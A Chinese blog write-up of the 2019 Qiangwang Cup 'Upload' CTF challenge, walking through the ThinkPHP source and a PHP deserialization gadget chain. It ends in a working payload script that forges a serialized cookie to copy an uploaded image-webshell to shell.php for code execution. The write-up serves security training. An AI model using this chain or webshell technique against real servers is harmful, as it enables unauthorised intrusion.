[强网杯 2019]Upload

最新推荐文章于 2023-11-12 23:00:01 发布
最新推荐文章于 2023-11-12 23:00:01 发布
阅读量897 收藏 2
点赞数 1
分类专栏: 代码审计php 文章标签: java 服务器 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/128356798
版权

一、信息收集 

打开界面是一个登陆,界面随便注册一个然后登陆

 

然后是一个上传文件的操作,点击php后发现的回显

 然后又上传了一个图片文件,显示出了照片的存放路径,这里可以上传图片码

 然后抓包看一下,base64解码

 a:5:{s:2:"ID";i:3;s:8:"username";s:3:"111";s:5:"email";s:10:"111@qq.com";s:8:"password";s:32:"698d51a19d8a121ce581499d7b701668";s:3:"img";s:79:"../upload/c47b21fcf8f0bc8b3920541abd8024fd/f47454d1d3644127f42070181a8b9afc.png";}

发现是序列化,那么肯定会有反序列化的地方目前还没遇到,也没提示的点了,扫一下目录,扫到了www.tar.gz

里面有用的也就四个文件   index.php  login.php  profile.php  Register.php

二、代码审计

index.php 最重要的也就是cookie反序列化哪里

<?php
namespace app\web\controller;
use think\Controller;

class Index extends Controller
{
    public $profile;
    public $profile_db;

    public function index()
    {
        if($this->login_check()){ //因为下面有exit  这里肯定是为false或者0
            $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/home";
            $this->redirect($curr_url,302);
            exit();
        }
        return $this->fetch("index");
    }

    public function home(){
        if(!$this->login_check()){  //这
            $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
            $this->redirect($curr_url,302);
            exit();
        }
//其实到这里我们只要访问index 和home肯定会执行cookie反序列化
        if(!$this->check_upload_img()){
            $this->assign("username",$this->profile_db['username']);
            return $this->fetch("upload");
        }else{
            $this->assign("img",$this->profile_db['img']);
            $this->assign("username",$this->profile_db['username']);
            return $this->fetch("home");
        }
    }

    public function login_check(){
        $profile=cookie('user');//存入cookie中
        if(!empty($profile)){
            $this->profile=unserialize(base64_decode($profile));//这里是把cookie反序列化
            $this->profile_db=db('user')->where("ID",intval($this->profile['ID']))->find();
            if(array_diff($this->profile_db,$this->profile)==null){
                return 1;
            }else{
                return 0;
            }
        }
    }

    public function check_upload_img(){
        if(!empty($this->profile) && !empty($this->profile_db)){
            if(empty($this->profile_db['img'])){
                return 0;
            }else{
                return 1;
            }
        }
    }

    public function logout(){
        cookie("user",null);
        $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
        $this->redirect($curr_url,302);
        exit();
    }

    public function __get($name)
    {
        return "";
    }

}

login.php  是一些登陆验证没多大用感觉

<?php
namespace app\web\controller;
use think\Controller;

class Login extends Controller
{
    public $checker;

    public function __construct()
    {
        $this->checker=new Index();
    }

    public function login(){//因为有 exit两条路要么,checker为0要么第二个if为false
        if($this->checker){
            if($this->checker->login_check()){
                $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/home";
                $this->redirect($curr_url,302);
                exit();
            }
        }

        if(input("?post.email") && input("?post.password")){
            $email=input("post.email","","addslashes");
            $password=input("post.password","","addslashes");
            $user_info=db("user")->where("email",$email)->find();
//上面就是一些登陆验证啥的不用管
            if($user_info) {
                if (md5($password) === $user_info['password']) {
                    $cookie_data=base64_encode(serialize($user_info));
                     //这里有个序列化 base64加密
                    cookie("user",$cookie_data,3600);
                    $this->success('Login successful!', url('../home'));
                } else {
                    $this->error('Login failed!', url('../index'));
                }
            }else{
                $this->error('email not registed!',url('../index'));
            }
        }else{
            $this->error('email or password is null!',url('../index'));
        }
    }


}

profile.php 是一个关键的类里面有get call魔术方法和上传目录的相关代码

<?php
namespace app\web\controller;

use think\Controller;

class Profile extends Controller
{
    public $checker;
    public $filename_tmp;
    public $filename;
    public $upload_menu;
    public $ext;
    public $img;
    public $except;

    public function __construct()
    {
        $this->checker=new Index();
        $this->upload_menu=md5($_SERVER['REMOTE_ADDR']);
        @chdir("../public/upload");
        if(!is_dir($this->upload_menu)){
            @mkdir($this->upload_menu);
        }
        @chdir($this->upload_menu);
    }

    public function upload_img(){
        if($this->checker){  //感觉每个里面都有这个先省略在这
            if(!$this->checker->login_check()){
                $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
                $this->redirect($curr_url,302);
                exit();
            }
        }

        if(!empty($_FILES)){  //上传的名字md5加密.png
//会改变之前的文件名,变成不可控所以要绕过这个if
//所以只能上传一次,不然后台就不为空了
            $this->filename_tmp=$_FILES['upload_file']['tmp_name'];
            $this->filename=md5($_FILES['upload_file']['name']).".png";
            $this->ext_check();
        }
        if($this->ext) {
            if(getimagesize($this->filename_tmp)) {
//getimagesize 是检测是不是图像类型比如png.jpg等
                @copy($this->filename_tmp, $this->filename);
//把文件复制到指定路径 filename_tmp是系统指定的
//如果我们能控制,指定路径的目录名称,然后传一个图片码不就可以getshell了码
                @unlink($this->filename_tmp);
                $this->img="../upload/$this->upload_menu/$this->filename";
                $this->update_img();
            }else{
                $this->error('Forbidden type!', url('../index'));
            }
        }else{
            $this->error('Unknow file type!', url('../index'));
        }
    }

    public function update_img(){
        $user_info=db('user')->where("ID",$this->checker->profile['ID'])->find();
        if(empty($user_info['img']) && $this->img){
            if(db('user')->where('ID',$user_info['ID'])->data(["img"=>addslashes($this->img)])->update()){
                $this->update_cookie();
                $this->success('Upload img successful!', url('../home'));
            }else{
                $this->error('Upload file failed!', url('../index'));
            }
        }
    }

    public function update_cookie(){
        $this->checker->profile['img']=$this->img;
        cookie("user",base64_encode(serialize($this->checker->profile)),3600);
    }

    public function ext_check(){
        $ext_arr=explode(".",$this->filename);
        $this->ext=end($ext_arr);
        if($this->ext=="png"){
            return 1;
        }else{
            return 0;
        }
    }

    public function __get($name)
    {
        return $this->except[$name];
    }  

    public function __call($name, $arguments)
    {
        if($this->{$name}){
            $this->{$this->{$name}}($arguments);
        }
    }

}

Register.php

<?php
namespace app\web\controller;
use think\Controller;

class Register extends Controller
{
    public $checker;
    public $registed;

    public function __construct()
    {
        $this->checker=new Index();
    }

    public function register()
    {
        if ($this->checker) {
            if($this->checker->login_check()){
                $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/home";
                $this->redirect($curr_url,302);
                exit();
            }
        }
        if (!empty(input("post.username")) && !empty(input("post.email")) && !empty(input("post.password"))) {
            $email = input("post.email", "", "addslashes");
            $password = input("post.password", "", "addslashes");
            $username = input("post.username", "", "addslashes");
            if($this->check_email($email)) {
                if (empty(db("user")->where("username", $username)->find()) && empty(db("user")->where("email", $email)->find())) {
                    $user_info = ["email" => $email, "password" => md5($password), "username" => $username];
                    if (db("user")->insert($user_info)) {
                        $this->registed = 1;
                        $this->success('Registed successful!', url('../index'));
                    } else {
                        $this->error('Registed failed!', url('../index'));
                    }
                } else {
                    $this->error('Account already exists!', url('../index'));
                }
            }else{
                $this->error('Email illegal!', url('../index'));
            }
        } else {
            $this->error('Something empty!', url('../index'));
        }
    }

    public function check_email($email){
        $pattern = "/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,})$/";
        preg_match($pattern, $email, $matches);
        if(empty($matches)){
            return 0;
        }else{
            return 1;
        }
    }

    public function __destruct()
    {
        if(!$this->registed){
            $this->checker->index();
        }
    }


}

发现了destruct序列化的入口,我们现在就可以构造链子了,如果想继续构造那么

registed的值必须为0,看了这么多代码,其实有关的就是三个if这里

public function upload_img(){
第一        if($this->checker){  //感觉每个里面都有这个先省略在这
            if(!$this->checker->login_check()){
                $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
                $this->redirect($curr_url,302);
                exit();
            }
        }

肯定是不满足直接checker为0,绕过

     第二   if(!empty($_FILES)){  
            $this->filename_tmp=$_FILES['upload_file']['tmp_name'];
            $this->filename=md5($_FILES['upload_file']['name']).".png";
            $this->ext_check();
        } 

第二个if我觉得就是对上传的文件进行md5名称.png

ext必须为1才向下运行
   第三     if($this->ext) {
            if(getimagesize($this->filename_tmp)) {
//getimagesize 是检测是不是图像类型比如png.jpg等
                @copy($this->filename_tmp, $this->filename);
//把文件复制到指定路径 filename_tmp是系统指定的
//如果我们能控制,指定路径的目录名称,然后传一个图片码不就可以getshell了码
                @unlink($this->filename_tmp);
                $this->img="../upload/$this->upload_menu/$this->filename";
                $this->update_img();
            }else{
                $this->error('Forbidden type!', url('../index'));
            }
        }else{
            $this->error('Unknow file type!', url('../index'));
        }
    } 

开头destruct结尾upload_img确定了直接调用,

$this->checker->index();   profile.php里面不存在就直接调用了call魔法函数

name的值就是方法的名也就是index

public function __get($name)
    {
        return $this->except[$name];
    }  

    public function __call($name, $arguments)
    {
        if($this->{$name}){//成为了这里的属性,而类中不存在index属性

//就会调用get魔法函数
            $this->{$this->{$name}}($arguments);
        }
    }

return $this->except[$name]; 其实现在就是return $this->except[index];

except是一个数组,正好我们想要调用的这个public function upload_img()也是在同一个类中,那个我们给 index赋值  upload_img这个方法不就可以了吗 

三、getshell

<?php
namespace app\web\controller;
class Register
{
    public $checker;
    public $registed=0;
}
class Profile
{
    public $checker=0;
    public $filename_tmp='./upload/c47b21fcf8f0bc8b3920541abd8024fd/a7c3ce076585477741d951d179ab07dc.png';
    public $filename='./upload/c47b21fcf8f0bc8b3920541abd8024fd/shell.php';
    public $upload_menu;
    public $ext=1;
    public $img;
    public $except=array('index'=>'upload_img');

}
$a=new Register();
$a->checker=new Profile();
echo base64_encode(serialize($a));

这里filename_tmp就是我们上传图片码的文件位置,下面filename是我们自己构造的

然后因为是cookie反序列化,直接存入cookie刷新页面就会自动反序列化了

首先传入cookie

然后直接访问文件,出现图片的代码、

 

接下来我们可以通过一句话木马来getshell 

获得flag 

偶尔躲躲乌云334
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反序列化(强网杯2019—UPLOAD
kid的博客
05-29 5793
反序列化(强网杯2019—UPLOAD) 前言 这里主要是复现一下强网杯2019web的第一题,UPLOAD。这是一道反序列化的题,反正我觉得挺难的,当时已经锁定了反序列化的方向也没能完成… 感谢大佬提供的复现环境:https://github.com/CTFTraining/qwb_2019_upload UPLOAD 进入靶场后首先是一个登陆注册页面 这里很自然的要想到有没有注入,简单的万能...
[BUUCTF][强网杯 2019]Upload
cosmoslin的博客
01-22 1803
考点 代码审计 反序列化 解题 信息搜集 首先打开是一个登录框,尝试sql无果 注册登录,发现一个文件上传页面 先试试文件上传,会将jpg文件转换为png,文件名随机生成 dirsearch扫一下目录,有备份文件www.tar.gz 解压后是一个tp5的框架 代码审计 打开文件后有两个断点 application/web/controller/Index.php 在访问大部分页面时都会调用到login_check方法,该方法将传入的用户信息反序列化,再到数据库中进行检查 application/web
2019强网upload
m0_61448651的博客
07-21 607
2019强网upload
[强网杯 2019]Upload wp
qq_41891666的博客
07-16 1529
0x00 前言 本来是在刷 文件上传的题,然后没想到强网杯这个题打着upload 的幌子其实是个反序列化题,看了看wp 后,觉得很有意思,值得记录一下 0x01 题解 1.首先用户登录后的 cookie 是一串加密的内容,很可疑,base64 解密之后,发现是序列化的内容 2.dirmap 扫目录,扫到源码,/www.tar.gz 下载之后发现里面包含源码,以及.idea 文件,phpstorm 打开发现断点,估计是出题人故意留的提示 3.审计源码 先看两个断点处: login_check() 函数
强网杯 2019 Upload(代码审计、反序列化、thinkphp5,附代码审计详解)
最新发布
2301_76690905的博客
11-12 113
首先看到登录和注册页面,爆破了一下admin登录界面无事发生,注册后登录看见一个上传头像的上传点(不知道是不是容器原因,上传完第一次后上传不了第二次一直显示连接不上),扫了下目录扫出一些文件,其中有用的是www.tar.gz打开压缩包能看见是th5,查看查看看到其定义的路由都指向了这个模块,该模块下共有四个控制器(四个文件的审计在最后)关键的点在于:Index.php中的login_check()中,有一处使用了反序列化,并且没有进行任何过滤寻找别的魔术方法Register.php中:Profile.php
强网杯-upload1
08-08
强网强网先锋upload题,题目附件是data.pcapng文件直接打开(如果有wireshark软件)通过观察,发现有两个有用的数据包第一个是No. 2打开
upload2019.rar
06-25
upload-2019,该环境是用于练习文件上传漏洞的,通过该环境的练习能够使自己更加牢固的掌握文件上传的漏洞原理以及运用
安装upload-labs
10-22
安装upload-labs
upload file package
07-13
upload file package
upload插件
05-11
upload的扩展插件,直接用,很方便,如果需要这一插件的可以看一下。
2019强网杯部分writeup
Sea_Sand息禅
06-04 5525
Web 1、UPLOAD 复现环境https://github.com/CTFTraining/qwb_2019_upload 先看一下网站情况: 是一个注册可登录的界面,登陆之后可以上传图片,一个账号只能上传一次。 扫一下后台目录,发现upload是泄露的,www.tar.gz是泄露的。 www.tar.gz下载下来是网站的源码,upload则是我们上传的文件,找到上传文件的源码: &lt...
unserialize入门练习
xiaobai的博客
08-27 1060
知识点 必须知道的魔术方法: __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(),当对不可访问属性调用unset()时被调用。 __sleep(),执行serialize(
BUUCTF:[强网杯 2019]Upload
末初的CSDN博客
03-27 3141
参考:https://www.zhaoj.in/read-5873.html 稍微测试了一下,不存在注入或者万能密码登录,先注册登录 先传一句话木马图片上去看看 上传的是一张jpg的图片,传上去之后被改后缀为png,而且可以看到路径和文件名都进行了重命名使用md5值 目录扫描出一个www.tar.gz在网站根目录,使用phpstorm打开,发现是ThinkPHP5框架 而且存在....
[CTFTraining] 0CTF 2016 Unserialize
ZXW_NUDT的博客
06-01 2438
[CTFTraining] 0CTF 2016 Unserialize
el-upload before-upload
07-28
el-upload 是 Element UI 组件库中的一个上传组件,用于实现文件上传的功能。before-upload 是 el-upload 组件的一个属性,用于在上传文件之前对文件进行处理或验证。 在 el-upload 组件时,可以通过 before-upload...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值